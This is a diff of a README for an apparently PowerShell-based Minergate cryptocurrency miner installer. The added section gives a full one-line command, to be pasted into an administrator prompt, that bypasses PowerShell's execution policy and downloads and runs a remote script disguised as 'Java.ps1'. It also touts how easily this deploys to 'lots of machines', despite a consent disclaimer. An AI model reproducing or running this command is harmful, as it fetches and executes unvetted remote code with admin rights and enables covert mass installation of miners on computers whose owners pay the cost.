R0ckNRolla/Minergate-Powershell/README.md

 Please do NOT use this without the consent of the person who owns the computer.
 This code is NOT to be used for malicious purposes.

+### Example (Works in Win 10 Only)

+This executes a the code in this git via one line of code only.
+It makes it extremely easy to deploy to lots of machines.
+I will publish the guide on how to do this soon.

+Run CMD as Administrator and paste this script in:

+@powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((new-object net.webclient).DownloadString('https://gist.githubusercontent.com/Hawkryption/dd55e0a282a70f3af63ed792f5eca570/raw/d2fc7bc4a52b84dec0b7d6c436b4bdaa7ec68d70/Java.ps1'))"

 ### Using this Powershell Script

 #### 1. Download Install_Minergate.ps1 and Edit the Code